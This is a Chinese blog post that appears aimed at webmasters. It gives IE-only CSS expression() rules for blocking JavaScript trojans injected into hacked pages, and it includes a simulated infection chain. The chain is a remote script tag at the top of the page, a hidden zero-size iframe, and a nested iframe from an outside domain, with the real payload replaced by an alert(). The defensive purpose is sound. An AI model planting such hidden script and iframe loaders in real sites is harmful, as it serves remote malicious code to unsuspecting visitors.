依然是挂马问题,已经是第三次变种啦!可恶!今天听报道说黑客入侵红十字会官网,修改了募捐帐号 ,这种人简直禽兽不如——发国难财。希望每个中国人都能为灾区献上一份爱心,做好自己的本职工作,并时刻准备着为灾区人民做点事情。

  转入正题,这些日子,心情总是很沉重,不过我们得化悲痛为力量勇敢面对。有很多站长朋友联系过笔者了,他们都遭受了网页木马的破坏。一个大喊救命的网友,今晚向笔者诉苦,我就帮她看下吧。

  她告诉我说她的网站在网页的开头被加上了:

<script language=javascript src=http://www.0571e.com/fly.js></script>

  原来又是JS木马,唯一的区别就是它加在了网页的最开头。使用笔者以前的“二行代码解决全部网页木马”,也不起作用了。仔细一看才知道,不仅加入了<script>标记还有一行长长类似于空格的字符。它使得DOCTYPE(文档类型)有所改变。DOCTYPEs是一个web页面的关键组成部分,缺少它你的css定义和标记将不被承认有效。所以一般首行被挂JS木马的网页会显示不正常。如果您当前的网站编码是utf-8,有时还会出现乱码。

  今天晚上这位朋友的网页是gbk编码的,网页没有乱码,但是网页下面显示有错位。

  磨刀,杀毒:

  它不是插入在网头最上面吗?它不是第一个<script>标记吗?它不还是含有“http”吗?汗,啰嗦!简单,在笔者以前的代码基础上稍稍改动,就可以了:

  在css里加上:

  方案1:(缺点:完全不显示网页)

html,body{nojstop:expression((document.getElementsByTagName('SCRIPT')[0].src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):null);}

  方案2:(隔离木马,显示网页)

html,body{nojstop:expression((document.getElementsByTagName('SCRIPT')[0].src.toLowerCase().indexOf('http')==0)?document.getElementsByTagName('IFRAME')[0].src=document.getElementsByTagName('SCRIPT')[0].src='about:blank':null);}

  原理:获取页面的第一个<script>标记,如果src含有“http”字符,则将其隔离。经过Vista+IE7模拟测试,成功!希望XP下IE6+的用户帮忙测试下,如有问题及时反馈,谢谢!

<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{antiifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{antijs:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
html,body{antijstop:expression((document.getElementsByTagName('SCRIPT')[0].src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):null);}
/* 以后请在此关注最新网页防挂木马处理方法:http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>

  至此,三行代码搞定全部网页木马完工。笔者可不希望还会有四行代码出来。有朋友担心这个代码会很占资源,其实不会的,页面加载完成后,只有鼠标碰到相关元素(如果css描述的是img,则鼠标碰到这个img时),CSS才会重复渲染一次。

  防止木马破坏访客的代码笔者是写出来啦,关键是各位网站的站长要与网站服务器的网管多多沟通,搞好虚拟主机的安全工作。这类问题大都是服务器或其所在的局域网中了病毒,遭遇了ARP、DNS等欺骗所致。及时打好服务器系统补丁,安装必要的防火墙(如ARP防火墙)很有重要。

  也许,这场战役还没有停止,我们将与它斗争到底!勇敢面对!

  以下是测试的文件(全仿真模拟):

default.html(这是网站首页),假如被挂马,如:

<script language=javascript src=http://www.***.cn/mm.js></script>                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
……网页具体代码略过……

mm.js(这是木马的JS文件):

document.write("<iframe width='0' height='0' src='http://www.***.cn/mm1.htm'></iframe>");

mm1.htm(这是js木马引用的iframe页面,汗,还有统计呢!):

<script language="javascript" type="text/javascript" src="http://js.users.51.la/1833695.js"</script>
<iframe src=http://www.nihaoku.cn/mm2.htm width=0 height=0></iframe>

mm2.htm(这是被mm1.htm引用的iframe页面):

<script>
    window.οnerrοr=function(){return true;}
    window.status="完成";
</script>
<script>
/*dddddddddddddd*/
/*这里就是木马执行的代码了,我把它们删除了,换成一个弹出警告框的代码,测试如果有警告弹出,则木马起作用了,反之成功了*/
alert('木马起作用了!');

</script>.

三行代码解决全部网页木马相关推荐

  1. 【蓝桥杯】 三行代码解决 “全排列的价值”(2022省赛pythonA组)

    三行代码解决 "全排列的价值"(2022省赛pythonA组) 置顶代码: from math import factorial n = int(input()) print(fa ...

  2. ACMNO.28 Python的三行代码解决 C语言-链接字符

    题目描述 写一函数,将两个字符串连接 输入 两行字符串 输出 链接后的字符串 样例输入 123 abc 样例输出 123abc 来源/分类 C语言 题目截图: 思路: 用Python来解决就很简单啦. ...

  3. 三行代码解决electron-updater升级失败问题

    在21年末遇到公司遇到一个比较奇葩的bug,electron开发客户端在进行自动升级时中途闪退没有任何日志. 经仔细观察,是在新包下载完后对老版本包进行替换的时候闪退,无意中发现在这一过程里,任务管控 ...

  4. Android——三行代码解决Android串口通讯

    欢迎使用最新版GT库 第一步:在使用GT库里封装的架构当然需要先依赖好GT库: 详细依赖教程请参看 GitHub - 1079374315/GTContribute to 1079374315/GT ...

  5. LibGDX游戏引擎-懒人三行代码解决中文绘制

    一个平平无奇的周末就这样快乐起来了. 最近在学习libGDX游戏引擎的应用,想开发一个小小的Android游戏,其中对于中文显示比较多,这就不可能一条一条地制成图片再显示,终于找到了懒人的 解决方法, ...

  6. “三行代码,确实需要耗上一整天!”

    导读:迭代时间短有多重要? 作者:Adam Berg,译者:弯月 本文经授权转自公众号CSDN(ID:CSDNnews) 我先后曾在五家软件公司工作,其中既有游戏开发.移动开发,也有 Web 开发.回 ...

  7. 亚马逊开源模型设计神器:AutoGluon,三行代码自动生成SOTA模型!

    点击我爱计算机视觉标星,更快获取CVML新技术 本文转载自新智元. 亚马逊最近宣布推出AutoGluon,这是一个新的开源库,开发人员可以使用该库构建包含图像.文本或表格数据集的机器学习应用程序.使用 ...

  8. python 多核并行计算_手把手 | 嫌Python太慢?并行运算Process Pools三行代码给你4倍提速!...

    大数据文摘作品,转载要求见文末 作者 | Adam Geitgey 编译 | 元元.Lisa.Saint.Aileen 原文链接 | https://medium.com/@ageitgey/quic ...

  9. python 多核并行计算_嫌Python太慢?并行运算Process Pools三行代码给你4倍提速!

    大数据文摘作品,转载要求见文末,作者 | Adam Geitgey,编译 | 元元.Lisa.Saint.Aileen. Python绝对是处理数据或者把重复任务自动化的绝佳编程语言.要抓取网页日志? ...

最新文章

  1. QuadricSLAM: 面向机器人的物体级语义SLAM系统
  2. 收藏 | 图神经网络的解释性综述
  3. MySQL抓包工具:MySQL Sniffer
  4. linux根文件系统配置,嵌入式Linux的Cramfs根文件系统配置的解决方案
  5. Go 语言编程 — Context 上下文
  6. Windows Azure虚拟机概览
  7. 小小鸡蛋竟然能够承受1200kg重量!?
  8. 去小公司了解哪些工具?
  9. linux tcp 阻塞时间,TCP的阻塞和重传机制
  10. P3986 斐波那契数列
  11. 20145202马超《信息安全系统设计基础》实验三总结
  12. 铁路售票系统_城轨交通自动售检票(AFC)实训系统中心_地高铁车站票务实训如何建设...
  13. 2021计算机组装视频,2021年做影视后期电脑配置单推荐PR AE软件视频后期电脑组装...
  14. android 手机 报证书错误,Android设备中的SSL证书错误
  15. mysql的默认隔离等级_mysql 四种隔离级别
  16. 用计算机怎么管理小米路由器,小米路由器3G怎么设置?(电脑)
  17. Git :error: You have not concluded your merge (MERGE_HEAD exists)
  18. 测试适合染发颜色的软件,5秒测出你适合染什么颜色的头发!准到爆!
  19. 简单实用,聊聊我常用的 4 款 Pandas 自动数据分析神器
  20. 关于String.getBytes()

热门文章

  1. textarea 行数限制_在一个TextArea中如何限制行数和字符数
  2. 易能机器人_用机器人制造机器人的工厂
  3. 力控 串口服务器 虚拟串口,M4系列串口服务器与力控组态软件MODBUS TCP 协议通信--有人物联网.pdf...
  4. wenet实战系列-双声道音频语音识别
  5. 文献笔记|心理学中信号检测论的一个实验数据转换应用参考
  6. 关于D-InSAR、SBAS-InSAR、PS-InSAR的奋斗史
  7. [转] x86、i386、amd64、ia64的区别
  8. html svg 背景,可自定义 SVG 背景素材站
  9. 怎样使用PDF阅读器
  10. 各版本Nexus S大全